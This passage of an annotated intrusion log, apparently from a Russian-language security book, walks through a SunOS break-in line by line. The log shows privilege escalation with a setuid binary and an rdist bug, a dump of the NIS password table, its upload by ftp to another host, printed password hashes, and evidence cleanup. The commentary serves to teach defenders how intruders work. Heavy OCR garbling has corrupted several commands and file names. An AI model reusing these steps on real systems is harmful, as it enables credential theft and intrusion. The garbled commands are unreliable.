101 # ed c.c

102 ?c,c: No such file or directory

103 #cd

104 # edc.c

105 /uid/

106 setuid(21477);

107 setuid(13147);

108 #ссс. с

109 # mv a.out shit

110 #chmod 6777 shit

111 #./shit

112 $ id

113 uid=13147(jeff) gid=0(wheel) groups=7

114 $ rlogj tsunami

115 rlogj: not found

116 $ rlogin tsunami

117 No directory! Logging in with home=/

118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992

119 You have new mail.

Строки с № 120 по № 126

Хакер (который сейчас является пользователем jeff), запускает командную оболочку sh, чтобы не оставлять след в журналах. history оболочки csh. (Хакер тщательно следит за тем, чтобы не оставить свидетельств применения своих команд.) Затем он проверяет, нет ли кого еще в системе.

Строки с № 127 по № 136

Хакер пытается скопировать файл паролей и получает отказ в разрешении, так как у него нет разрешения копировать в этот каталог. Он проводит проверку с целью установить, под каким именем он зарегистрировался (должно быть, он уже его забыл). Он видит, что зарегистрировался как Jeff. Так как Jeff не имеет разрешения копировать файлы в этот каталог, то хакер меняет каталог на /tmp, в который любому пользователю разрешено производить копирование.

Строки с № 137 по № 141

Здесь он немного расправляет крылья и ищет таблицу паролей, чтобы ее скопировать и использовать. (Он копирует файл паролей NIS в файл, названный "ааа".) Хакеры часто копируют файлы паролей, чтобы подвергнуть их действию программ-взломщиков и получить больше паролей. Чем больше паролей есть у хакера, тем лучше он преуспеет в набегах на другие системы.

120 tsunami%AC

121 tsunami%sh

122 $ who

123 wendy ttyp2 Jan 6 13:55 (arawana)

124 derek ttyp3 Jan 13 17:57 (lajolla)

125 derekttyp4Jan 15 13:11 (lajolla)

126 jeff ttyp5 Jan 18 23:09 (valley)

127 $cat/etc/passwdAC

128 $ypcaty" C

129 $ ypcat passwd > suna

130 suna: Permission denied

131 Sid

132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)

133 $pwd

134 $cd

135 $pwd

136 $cd/tmp

137 $ ypcat passwd >aaa

138 $ Is — tal aa

139 aa not found

140 $ is — tal aaa

141 — rw-r — r— 1 jeff 15382 Jan 18 23:09 aaa

Строки с № 142 по № 162

Теперь он открывает сессию ftp обратно к первоначальному хосту (valley) как пользователь ingres. В этой сессии он копирует файл паролей в систему valley. В той же самой сессии он копирует свои инструменты по работе с защитой из valley в tsunami.

Строки с № 163 по № 173

Снова он воссоздает свою небольшую С-программу (опущенную по соображениям безопасности) для того, чтобы воспользоваться программной ошибкой, открывающей защиту, и получить права доступа суперпользователя (root). Теперь он имеет полный контроль (доступ root) над системой tsunami.

142$ ftp valley

143 Connected to valley

144 220 valley FTP server (SunOS 4.1) ready.

145 Name (valley: jeff): ingres

146 331 Password required for ingres.

147 Password:

148 230 User ingres logged in.

149 ftp> send aaa

150 200 PORT command successful.

151 150 ASCII data connection for aaa

152 226 ASCII Transfer complete.

153 local: aaa remote: aaa

154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s)

155 ftp> get foo

156 200 PORT command successful.

157 150 ASCII data connection for foo

158 226 ASCII Transfer complete.

159 local: foo remote: foo

160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s)

161 ftp> quit

162 221 Goodbye.

163 $ cat too | /usr/ucb/rdist — Server localhost

164$/tmp/sh

165#rmfoo

166#rm/tmp/sh

167 rm: override protection 755 for /tmp/sh? у

168#edc.c

169#ccc.c

170 #chmod 6777 a.out

171 #./a.out

172 # id

173 uid=0(root) gid=0(wheel) groups=50(iastaff)

Строки с № 174 по № 182

Хакер ищет, есть ли в файле /etc/passwd какие-нибудь записи password.old или другие изменения. Он также пытается изменить пароль Jeff в NIS, но безуспешно.

Строки с № 183 по № 197

На этот раз он выводит список содержимого файла /etc/passwd.

174 # Is — ta! /etc/*ass*

175 — rw-r-r-1 root 634 Dec 7 12:31 /etc/passwd

176#cat/etc/}4U

177passwd

178 cat: /etc/}4: No such file or directory

179 Changing NIS password for jeff on suntzu.

180 Old password:

181 New password:

182 Password unchanged.

183 # cat/etc/passwd

184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh

185nobody:*:65534:65534::/:

186daemon:*;1:1::/:

187sys:*:2:2::/:/bin/csh

188bin:*:3:3::/bin:

189 uucp:*:4:8::/var/spool/uucppublic:

190 news:*:6:6::/var/spool/news:/bin/csh

191 ingres:*:7:7::/usr/ingres:/bin/csh

192 audit:*:9:9::/etc/security/audit:/bin/csh

193 sync::1:1::/:/bin/sync

194 sysdiag:*:0;1:Old System Diag:/usr/diag/sysdiag:/usr/diag/ sysdiag/sysdiag

sundiag:*:0:1:System Diag:/usr/diag/su ndiag:/usr/diag/

sundiag/ sundiag

195 operator: INtDk7crldKh2:5:5 — Account forbackups;/usr/ backup: /bin/csh

196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh

197+::0;0:::

Строки с № 198 по № 209

Хакер меняет ID пользователя с суперпользователя обратно на jeff. Затем он повторно проверяет свой ID пользователя и начинает менять имя своего a.out на такое, которое он не забудет (как он уже прежде делал). Снова он запускает команду ls -1 для получения списка с новейшими файлами в начале его.

Строки с № 210 по № 212

Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код и готов идти дальше.

Строки с № 213 по № 227

Хакер проверяет, какие файловые системы подмонтированы.

198 #4)

199 # id

200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff)

201 # тс^С

202 # mv^С

203 #mv a.out shit

204 # Is — tal

205 total 2415

206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.

207 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

208-rw-r-r- 1 root 61 Jan 18 23:11 c.c

209 — rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa

210#rmaaa

211 #rmc.c

212 rm: override protection 644 for c.c? у

213 #df

214 Filesystem kbytes used avail capacity Mounted on

215 /dev/sdOa 10483 5081 4354 54 % /

216 /dev/sdOg 96943 78335 8914 90 % /usr

217 /dev/sdOe 22927 3111 17524 15 %/var

218 /dev/sd1h 1255494 1081249 48696 96 % /home

219 /dev/sd3h 1255494 1030386 99559 91 % /home/se

220 la:/usr/local 2097151 1154033 692365 63 % /usr/local

221 suntzu:/var/spool/mail

222 445852 334295 66972 83 % /var/spool/mail

223 mfp:/home/sybase 318991 244337 42755 85 % /home/sybase

224 арр1:/export/sun/sun4/openwin-3,0

225 189858 131073 39799 77 % /usr/openwin

226 арр1:/export/apps 1255494 771887 358057 68 % /export/apps

227 appl:/export/apps 1255494 771887 358057 68 % /usr/local

Строки с № 228 по № 229

Неверный ввод или, возможно шумы в линии.

Строки с № 230 по № 258

Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользователем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать пользователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se

229 irG-cd: not found

230 # cd/home/se

231 # Is

232 cmeyer hamant lost+found mikec wendy

233 colleen Joseph mark mikep

234 derek kevin matthews neally

235 # cd wendy

236 # cp Дтр/shit.

237 # Is — tal shit